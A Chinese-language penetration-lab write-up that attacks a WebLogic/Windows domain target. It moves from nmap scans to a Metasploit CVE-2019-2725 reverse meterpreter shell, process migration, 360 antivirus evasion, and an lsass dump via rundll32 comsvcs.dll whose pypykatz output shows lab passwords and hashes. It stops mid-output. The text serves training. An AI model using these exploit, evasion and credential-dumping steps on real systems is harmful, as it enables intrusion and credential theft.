一、靶场信息
相关注意事项:
二、信息搜集 1、TCP 端口扫描 + 指纹识别 + 操作系统识别 工具:rustscan + nmap
nmap 带上 -Pn 参数,表示不进行主机发现,这是为了避免主机发现失败导致的指纹探测失败。
因为 nmap 的默认扫描逻辑是这样的:
主机存活探测(ICMP ping / TCP ping) ↓ 没有响应? ↓ 认为主机已下线 → 直接跳过,不扫端口
问题在于,很多主机(尤其是 Windows、有防火墙的服务器)会屏蔽 ICMP ,但端口服务完全正常运行。Nmap 误判主机离线,导致你什么都扫不到。
命令:
sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n
输出(由于输出很长,只是截取了关键的部分):
PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Microsoft IIS httpd 7.5 135/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 63 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 3389/tcp open ms-wbt-server? syn-ack ttl 63 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled) 49152/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49176/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49194/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 60966/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type : general purpose Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu) SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7) SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7) OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11) WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000) ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=) T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=N) U1(R=N) IE(R=N) Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026) TCP Sequence Prediction: Difficulty=265 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 2 IP addresses (2 hosts up) scanned in 181.06 seconds Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)
2、UDP 扫描关键端口 + 指纹识别 补一轮 UDP 扫描,以免漏掉关键信息:
工具:Nmap
命令:
sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80
输出:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800 Nmap scan report for 192.168.111.80 Host is up. PORT STATE SERVICE VERSION 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp 162/udp open|filtered snmptrap 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 514/udp open|filtered syslog 520/udp open|filtered route 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 49152/udp open|filtered unknown Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address (1 host up) scanned in 128.47 seconds
3、优先级列表 目标:大概率是一台 Windows Server 2008 R2
架构:几乎可以确认是 x64
端口聚焦:
PORT STATE SERVICE REASON VERSION 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
T3 协议是 WebLogic 的远程对象协议,默认开放,且历史上反复出现反序列化漏洞。
PORT STATE SERVICE REASON VERSION 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
MS17-010 (EternalBlue) 这个漏洞在 2008 R2 上默认存在,直到打补丁为止。
三、漏洞查找与验证 1、CVE-2019-2725 根据指纹信息查找相关的漏洞:
值得注意的是,关键词限制并不是却多越好,有些时候放宽点关键词,能看到更丰富的信息。
查看 CVE 编号:
zyf@kali:~$ searchsploit -x 46780 | head -10 Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution URL: https://www.exploit-db.com/exploits/46780 Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py Codes: CVE-2019-2725 Verified: False File Type: Python script, ASCII text executable, with very long lines (6251)
是 CVE-2019-2725,打开 MSF,通过 search 命令找对应的模块:
msf > search CVE-2019-2725 Matching Modules ================ - ---- --------------- ---- ----- ----------- 0 exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService 1 \_ target: Unix . . . . 2 \_ target: Windows . . . . 3 \_ target: Solaris . . . . Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'
使用模块并验证:
msf > use 0 [*] Using configured payload cmd/unix/reverse_bash msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice Platform: Unix, Windows, Solaris Arch: cmd, x64, x86 Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2019-04-23 Provided by: Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com> Module side effects: ioc-in-logs Module stability: crash-safe Module reliability: repeatable-session Available targets: Id Name -- ---- => 0 Unix 1 Windows 2 Solaris Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type :host:port[,type :host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4 RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 7001 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService VHOST no HTTP server virtual host Payload information: Description: An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. References: https://nvd.nist.gov/vuln/detail/CVE-2019-2725 http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999 https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://twitter.com/F5Labs/status/1120822404568244224 View the full module info with the info -d command . msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows target => Windows msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44 LHOST => 192.168.111.44 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80 RHOST => 192.168.111.80 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check [+] 192.168.111.80:7001 - The target is vulnerable.
存在漏洞
2、永恒之蓝 用 Nmap 的 NSE 脚本验证是否存在漏洞:
┌──(zyf㉿kali)-[~/hongr2] └─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800 Nmap scan report for 192.168.111.80 Host is up (0.068s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor : HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date : 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done : 1 IP address (1 host up) scanned in 1.99 seconds
漏洞存在。
有两个入口,鉴于红人靶场(一)用过了永恒之蓝,这里就用 CVE-2019-2725。
四、漏洞利用 选择 payload 之后,直接 run:
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload payload/windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run [-] Handler failed to bind to 192.168.111.44:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Generating payload... [*] Sending payload... [*] Sending stage (232006 bytes) to 192.168.111.80 [*] Meterpreter session 1 opened (10.8.0.6:4444 -> 192.168.111.80:49477) at 2026-03-31 15:18:14 +0800 meterpreter >
拿下 meterpreter shell。
五、跳板机信息收集 meterpreter > sysinfo Computer : WEB OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : DE1AY Logged On Users : 5 Meterpreter : x64/windows
从 Domian 可以看出,目前出于一个域环境,且根据 Computer 可以看出本机的主机名是 WEB。
meterpreter > getuid Server username: WEB\Administrator
不难发现,是本机的 Administrator 权限。
六、迁移进程与权限提升 获取当前 pid:
meterpreter > getpid Current pid: 3676
查看进程列表:
Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 208 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 256 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 340 332 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 392 332 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 400 384 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 436 384 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe 496 392 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe 504 392 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe 508 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 512 392 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe 600 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 664 496 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 708 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 780 436 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe 788 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 836 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 880 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 924 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 968 496 ZhuDongFangYu.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\360\360Safe\deepscan\zhudongfangyu.exe 1144 496 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1192 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 1304 836 taskeng.exe x64 0 WEB\Administrator C:\Windows\system32\taskeng.exe 1316 496 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe 1360 1304 cmd.exe x64 0 WEB\Administrator C:\Windows\SYSTEM32\cmd.exe 1384 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 1392 496 sqlservr.exe x64 0 DE1AY\mssql c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\sq lservr.exe 1500 692 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 1528 496 SMSvcHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe 1548 496 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe 1700 496 ReportingServicesService.ex x64 0 DE1AY\mssql c:\Program Files\Microsoft SQL Server\MSRS10_50.SQLEXPRESS\Reporting Serv e ices\ReportServer\bin\ReportingServicesService.exe 1896 496 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1908 1360 java.exe x86 0 WEB\Administrator C:\Oracle\MIDDLE~1\JDK160~1\bin\java.exe 1956 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 1968 2528 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 2168 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 2232 3888 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 2328 496 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\sppsvc.exe 2348 4004 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 2432 496 fdlauncher.exe x64 0 NT AUTHORITY\LOCAL SERVICE c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\fd launcher.exe 2496 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 2520 600 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe 2528 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe 2560 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 2620 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 2668 496 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe 2784 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 2796 2432 fdhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE c:\Program Files\Microsoft SQL Server\MSSQL10_50.SQLEXPRESS\MSSQL\Binn\fd host.exe 2804 340 conhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\conhost.exe 2820 496 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe 2972 968 360Tray.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\360\360Safe\safemon\360Tray.exe 2996 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 3088 3604 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 3112 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 3280 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe 3344 1968 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 3484 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 3604 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe 3676 2348 powershell.exe x64 0 WEB\Administrator C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 3724 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 3868 340 conhost.exe x64 0 WEB\Administrator C:\Windows\system32\conhost.exe 3888 3280 powershell.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 4004 1908 cmd.exe x86 0 WEB\Administrator C:\Windows\SysWOW64\cmd.exe
目标选择:spoolsv.exe
首先要明确:什么是好的迁移目标?
需要满足三个条件:
条件
原因
SYSTEM 权限
不能降权,要保住 Administrator 及以上
x64 架构
必须和当前 Meterpreter 架构匹配
长期稳定运行
系统服务类进程,不会被用户操作关闭
现在看 ps 列表,符合三个条件的:
PID 1144 spoolsv.exe x64 NT AUTHORITY\SYSTEM ← 打印后台服务,常驻 PID 600 svchost.exe x64 NT AUTHORITY\SYSTEM ← 系统服务宿主 PID 1896 vmtoolsd.exe x64 NT AUTHORITY\SYSTEM ← VMware工具,靶场必然常驻
需要排除的是 svchost.exe,因为它同时跑着大量系统服务,migrate(Meterpreter 的进程迁移指令)进去如果操作不当可能导致系统不稳定。
vmtoolsd.exe 也不作为选项,因为它本质上是用于实现宿主机与虚拟机的交互,生命周期由宿主机控制,一旦靶场环境(虚拟机中)重启或者出现问题,这个进程可能就断了。
在观察进程的时候,可以注意到,本机子上运行着 360,而我们目前处于的进程(powershell.exe)刚好是 360 重点关注的对象,因此我们最好尽快 migrate 离开。
命令:
输出:
[*] Migrating from 3676 to 1144... [*] Migration completed successfully.
验证:
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > getpid Current pid: 1144
不仅实现了进程的迁移,还顺带提权成功。
七、横向移动
我看很多师傅的 WP,他们都将靶机中的 360、防火墙给关闭,但是我认为,这个是噪声很大的行为,通常真实环境中并不会采取这样的行动,即使是有,也只是微微修改。
1、域控制器 列出域 DE1AY 的所有域控制器(DC):
这里的:
输出:
C:\Windows\system32>nltest /dclist:DE1AY nltest /dclist:DE1AY Get list of DCs in domain 'DE1AY' from '\\DC' . DC.de1ay.com [PDC] [DS] Site: Default-First-Site-Name The command completed successfully
DC 的主机名是 DC。
这里为什么不使用 MSF 的后渗透模块呢?
因为 360 的存在,MSF 的后渗透模块的特征是比 Shell 原生命令要明显得多的。
查看所有网卡的信息:
Windows IP Configuration Host Name . . . . . . . . . . . . : WEB Primary Dns Suffix . . . . . . . : de1ay.com Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : de1ay.com Ethernet adapter �������� 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-50-56-B1-3E-D4 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::44ac:f4d2:de86:5630%13(Preferred) IPv4 Address. . . . . . . . . . . : 10.10.10.80(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.1 DHCPv6 IAID . . . . . . . . . . . : 301993001 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F DNS Servers . . . . . . . . . . . : 10.10.10.10 NetBIOS over Tcpip. . . . . . . . : Enabled Ethernet adapter ��������: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-50-56-B1-48-8C DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::bc90:5eb2:f5fa:68c7%11(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.111.80(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.111.1 DHCPv6 IAID . . . . . . . . . . . : 234884137 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F DNS Servers . . . . . . . . . . . : 10.10.10.10 NetBIOS over Tcpip. . . . . . . . : Enabled Tunnel adapter isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft ISATAP Adapter Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft ISATAP Adapter Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes
看得出本机是一个双网卡的主机:
外网是 192.168.111.80
内网是 10.10.10.80
并且还有一个关键信息,即域控的 IP 可能是 10.10.10.10
验证一下:
C:\Windows\system32> nslookup DC.de1ay.com nslookup DC.de1ay.com DNS request timed out. timeout was 2 seconds. ������: UnKnown Address: 10.10.10.10 ����: DC.de1ay.com Address: 10.10.10.10
确实是 10.10.10.10
2、凭证抓取 下面开始凭证抓取,注意此处还是不能使用 MSF 的后渗透模块,因为 360 的存在。
绕过的核心思路就是:把危险操作移到 AV 看不见的地方执行。
我们可以 dump lsass 内存,离线进行解析
原理:
Windows 把登录过的账户凭证缓存在 lsass.exe 进程内存里 ↓ 把 lsass.exe 的内存整个 dump 成文件 ↓ 把 dump 文件拉回 Kali ↓ 在 Kali 本地用 Mimikatz 离线解析,AV 管不到 Kali
用什么 dump lsass?
Windows 自带工具,不需要上传任何东西:
C:\> tasklist | findstr lsass
输出:
lsass.exe 504 Services 0 13,748 K
Dump:
C:\> rundll32.exe comsvcs.dll,MiniDump 504 C:\lsass.dmp full
验证文件是否生成:
输出:
dir C:\lsass.dmp ������ C �еľ�û�б�ǩ�� �������к��� 36C6-96D5 C:\ ��Ŀ¼ 2026/03/31 09:35 35,685,792 lsass.dmp 1 ���ļ� 35,685,792 �ֽ� 0 ��Ŀ¼ 23,998,697,472 �����ֽ�
把 lsass.dmp 拉回 Kali:
meterpreter > download C:\lsass.dmp /tmp/lsass.dmp
在 kali 本地分析:
pypykatz lsa minidump /tmp/lsass.dmp
输出:
INFO:pypykatz:Parsing file /tmp/lsass.dmp FILE: ======== /tmp/lsass.dmp ======= == LogonSession == authentication_id 165100 (284ec) session_id 0 username mssql domainname DE1AY logon_server DC logon_time 2026-03-31T03:25:30.862066+00:00 sid S-1-5-21-2756371121-2868759905-3853650604-2103 luid 165100 == MSV == Username: mssql Domain: DE1AY LM: f67ce55ac831223dc187b8085fe1d9df NT: 161cff084477fe596a5db81874498a24 SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d DPAPI: NA == WDIGEST [284ec]== username mssql domainname DE1AY password 1qaz@WSX password (hex)3100710061007a004000570053005800 == Kerberos == Username: mssql Domain: DE1AY.COM Password: 1qaz@WSX password (hex)3100710061007a004000570053005800 AES128 Key: 161cff084477fe596a5db81874498a24 AES256 Key: 6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009 == WDIGEST [284ec]== username mssql domainname DE1AY password 1qaz@WSX password (hex)3100710061007a004000570053005800 == TSPKG [284ec]== username mssql domainname DE1AY password 1qaz@WSX password (hex)3100710061007a004000570053005800 == DPAPI [284ec]== luid 165100 key_guid 11f6ca2e-f884-4d1f-b1fa-bb20a5e6a5c4 masterkey 810b10e1648e60605a112c8c2e1b0a3d8c6a45787b77d5f23e97aed52bf9f55bdbaccdd813291a5ee658e2a8999c16e2b6b96eb51e40eb211de2a303a57c5ed8 sha1_masterkey dbff98983da5df4a349bf9e342f64b9b9d1b85da == LogonSession == authentication_id 127932 (1f3bc) session_id 0 username mssql domainname DE1AY logon_server DC logon_time 2026-03-31T03:25:25.979257+00:00 sid S-1-5-21-2756371121-2868759905-3853650604-2103 luid 127932 == MSV == Username: mssql Domain: DE1AY LM: f67ce55ac831223dc187b8085fe1d9df NT: 161cff084477fe596a5db81874498a24 SHA1: d669f3bccf14bf77d64667ec65aae32d2d10039d DPAPI: NA == WDIGEST [1f3bc]== username mssql domainname DE1AY password 1qaz@WSX password (hex)3100710061007a004000570053005800 == Kerberos == Username: mssql Domain: DE1AY.COM Password: 1qaz@WSX password (hex)3100710061007a004000570053005800 AES128 Key: 161cff084477fe596a5db81874498a24 AES256 Key: 6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009 == WDIGEST [1f3bc]== username mssql domainname DE1AY password 1qaz@WSX password (hex)3100710061007a004000570053005800 == TSPKG [1f3bc]== username mssql domainname DE1AY password 1qaz@WSX password (hex)3100710061007a004000570053005800 == DPAPI [1f3bc]== luid 127932 key_guid 2448f6fe-7205-4d0f-bf26-ad62392fee41 masterkey 7f90a79da5e174918bcd0d1d9dd1817f14ec93452e30aa77f4baa8a44a8d6d96d9d4f5b03674ce769e9882310c4a3569782d088d725b5079e68c68656e58b01f sha1_masterkey babc839ce0711c54628f2b8d1bc9eece4fcea7c2 == DPAPI [1f3bc]== luid 127932 key_guid fd0e5033-a527-4336-9ce0-d8b80b5d114f masterkey 4a42f16a6bb4094a579796a3dff1d1c5c05ae88ff9a56983c63fd8803dbc7759da9faf2f525cf6f6450eacf6ac37edf3bb64636976b8df9e4c374b530c01af95 sha1_masterkey d11dc11589f0e61c97e8cb5873489475a87d7915 == DPAPI [1f3bc]== luid 127932 key_guid 11f6ca2e-f884-4d1f-b1fa-bb20a5e6a5c4 masterkey 810b10e1648e60605a112c8c2e1b0a3d8c6a45787b77d5f23e97aed52bf9f55bdbaccdd813291a5ee658e2a8999c16e2b6b96eb51e40eb211de2a303a57c5ed8 sha1_masterkey dbff98983da5df4a349bf9e342f64b9b9d1b85da == LogonSession == authentication_id 996 (3e4) session_id 0 username WEB$ domainname DE1AY logon_server logon_time 2026-03-31T03:25:21.907650+00:00 sid S-1-5-20 luid 996 == MSV == Username: WEB$ Domain: DE1AY LM: NA NT: c2ad29b45ce46e659d7eac123b4f383c SHA1: 62fc725c3e7e366b9517431e3473badeb0fb7819 DPAPI: NA == WDIGEST [3e4]== username WEB$ domainname DE1AY password cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password (hex)cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 == Kerberos == Username: web$ Domain: DE1AY.COM Password: cf783ba65bfa6e2b3f9139e6a42a746234cbb88211104247983ee34eb0f6bc14cf5905439444a7654908d5c95565876b0c9db3076acd5517a9874cad94ac14955428078eba7d72fa241003d675e494fe49d43bd811e979756cd2f295d9638ad0981fdf5f031eb694cd3632c5447700fde3e4077ada4376ab565cdf02bb5ef8326c512cb501387c77f9be016a30c474eb18c5b6dd68db05efb52cf9ffdcc02634de4b5a38d2ec628c05b02cd0ae4d0183c780faaef5b96555373e2591ba1f9d2970891f2b629614defce7360ff4276ec1d3f2c20d7649aaace8f4248f013c191228bb1b20f97904d7630c39519334ed51 password 